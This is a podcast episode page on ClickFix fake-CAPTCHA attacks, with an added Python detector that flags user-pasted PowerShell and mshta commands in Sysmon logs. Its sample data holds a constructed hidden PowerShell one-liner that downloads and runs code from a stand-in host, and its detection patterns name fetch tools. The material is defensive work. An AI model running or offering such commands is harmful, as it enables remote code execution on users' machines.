CyberWire Daily

Browser attacks without downloads. [Research Saturday]

Sep 20, 2025
Nati Tal, Head of Guardio Labs, dives into the alarming trend of ClickFix, a browser-based threat that uses fake CAPTCHAs to get malicious commands executed without any file being downloaded. He reveals how this tactic evolved from malvertising to leveraging compromised sites, tricking users into running harmful commands themselves. Tal emphasizes the importance of behavioral protections over traditional signature-based defenses and discusses strategies for mitigation, including raising user awareness and disabling PowerShell for users who do not need it. This approach could change how we defend against online threats.
INSIGHT

Captcha As A Command-Execution Vector

  • ClickFix shows a fake CAPTCHA whose "verification" steps have the user paste and run a PowerShell or shell command that the page has silently placed on the clipboard.
  • Once pasted, the command runs in milliseconds while the user believes they have only solved a CAPTCHA; no file is downloaded, so download-based controls never see it.
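The detection angle the episode argues for (behavior over signatures), as an added example that is not code from Guardio Labs or the CyberWire: a small Python triage rule over Sysmon-style process-creation events. It keys on the execution context ClickFix produces, an interpreter launched by explorer.exe (the Run box or a paste) rather than by a script, combined with command-line behaviors such as a hidden window, an execution-policy bypass, an encoded payload or a remote fetch, so a new domain or re-encoded payload still trips it. The Sysmon field names (Image, ParentImage, CommandLine) are real; the interpreter list, the pattern set, the decoy-comment heuristic and the JSON log records are assumptions constructed for this demo.

```python
"""Behavioral triage of ClickFix-style pasted commands.

Added example, not code from Guardio Labs or CyberWire. It assumes
Sysmon-style process-creation records (Image, ParentImage, CommandLine)
delivered as JSON lines; the records in SAMPLE_LOG are constructed.
"""
import json
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Interpreters a pasted Win+R command typically lands in (assumed set, extend as needed).
RUN_BOX_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                        "wscript.exe", "cscript.exe"}

# explorer.exe as parent means a person launched it (Run box, Start menu),
# not a script or scheduled task: that is exactly the ClickFix execution context.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# Behaviors, not hashes or domains: these survive payload and infrastructure changes.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget|https?://)",
        re.I),
    # Pasted one-liners often end in a decoy comment so the Run box shows
    # "I am not a robot" text (assumption from public samples, not this page).
    "decoy_comment": re.compile(r"#.*?(?:not a robot|captcha|verif)", re.I),
}


@dataclass
class Finding:
    event: dict
    reasons: List[str] = field(default_factory=list)


def analyze(event: dict) -> Optional[Finding]:
    """Return a Finding when the event looks like a user-pasted ClickFix command, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmdline = event.get("CommandLine", "")
    if image not in RUN_BOX_INTERPRETERS or parent not in USER_LAUNCH_PARENTS:
        return None  # script-spawned interpreters are another rule's job; this one is the paste
    reasons = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmdline)]
    # An admin opening a plain prompt from the Run box matches no behavior: stay quiet.
    return Finding(event, reasons) if reasons else None


def scan_lines(lines) -> List[Finding]:
    """Parse JSON log lines and return Findings for the suspicious ones; skip blanks and garbage."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # one malformed record must not kill the detector
        finding = analyze(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed Sysmon-style records: an admin's plain prompt, a ClickFix one-liner,
# a script-spawned mshta, a browser launch, and a ClickFix mshta variant.
SAMPLE_LOG = r'''
{"EventId": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
{"EventId": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"irm https://example.invalid/v.txt | iex\" # I am not a robot - reCAPTCHA Verification ID: 7811"}
{"EventId": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "mshta https://example.invalid/a.hta"}
{"EventId": 1, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "chrome.exe --profile-directory=Default"}
{"EventId": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://example.invalid/verify.hta"}
'''

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG.splitlines()):
        print(ntpath.basename(f.event["Image"]), "<-", ntpath.basename(f.event["ParentImage"]),
              f.reasons)
        print("    ", f.event["CommandLine"])
```

Running it reports the two records launched from explorer.exe with fetch or hide behavior and stays silent on the admin's plain powershell.exe from the Run box; the script-spawned mshta.exe is deliberately left to other rules. The same heuristics transfer directly to an EDR or SIEM query. On the host, corroboration that is not from the episode but from ordinary Windows forensics: the Run box keeps its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the pasted text is usually still there.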
ANECDOTE

From Malvertising To Compromised WordPress

  • Early ClickFix delivery used malvertising and pop-up tabs on gray-area streaming and download sites.
  • Attackers later shifted to compromising legitimate WordPress sites to increase trust and conversions.
INSIGHT

White-Hat Demos Fueled Malware Evolution

  • Public red-team demos and GitHub forks accelerated adoption and variation of the scam.
  • Security research examples served as templates attackers forked and evolved.